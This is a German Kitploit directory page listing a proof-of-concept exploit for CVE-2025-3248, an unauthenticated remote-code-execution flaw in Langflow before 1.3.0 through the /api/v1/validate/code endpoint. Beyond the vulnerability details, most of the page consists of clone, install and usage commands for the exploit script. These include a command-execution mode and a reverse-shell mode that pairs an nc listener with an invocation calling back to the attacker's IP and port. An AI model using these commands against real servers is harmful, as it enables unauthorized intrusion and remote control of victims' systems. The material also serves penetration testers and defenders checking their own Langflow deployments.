Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
langflow-exploit — PoC für CVE-2025-3248: unauthentifizierte RCE in Langflow < 1.3.0 über /api/v1/validate/code. | Kitploit
Tools/GitHubGitHub/preemware/langflow-exploit
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstests
GitHubpreemware/langflow-exploit

langflow-exploit

PoC für CVE-2025-3248: unauthentifizierte RCE in Langflow < 1.3.0 über /api/v1/validate/code.

Repository anzeigen
150vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-3248 – RCE im Langflow-Codevalidierungs-Endpunkt

Ein Proof-of-Concept-Exploit, der eine Remote-Codeausführung-Schwachstelle im Codevalidierungs-Endpunkt von Langflow demonstriert. Diese Schwachstelle betrifft Langflow-Versionen vor 1.3.0 und ermöglicht nicht authentifizierten Angreifern, beliebigen Code über manipulierte HTTP-Anfragen auszuführen.

Details zur Schwachstelle

  • CVE-ID: CVE-2025-3248
  • Betroffene Versionen: < 1.3.0
  • Angriffsvektor: Remote
  • Authentifizierung erforderlich: Nein
  • Auswirkung: Remote Code Execution (RCE)
  • Endpunkt: /api/v1/validate/code

Voraussetzungen

  • Python 3.x
  • Erforderliche Python-Pakete:
    • requests
    • colorama

Installation

  1. Klonen Sie das Repository:
root@kitploit:~
git clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
  1. Abhängigkeiten installieren:
root@kitploit:~
pip install requests colorama

Verwendung

Der Exploit unterstützt zwei Betriebsmodi:

1. Befehlsausführungsmodus

Führt einen einzelnen Befehl auf dem Zielsystem aus:

root@kitploit:~
python3 cve-2025-3248.py cmd <target_url> "<command>"

Beispiel:

root@kitploit:~
python3 cve-2025-3248.py cmd http://target:7860 "id"

2. Reverse-Shell-Modus

Erzeugt eine interaktive Reverse-Shell:

  1. Starten Sie zuerst einen Listener auf Ihrem Rechner:
root@kitploit:~
nc -lvnp 4444
  1. Führen Sie dann den Exploit aus:
root@kitploit:~
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>

Beispiel:

root@kitploit:~
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444
Tool herunterladen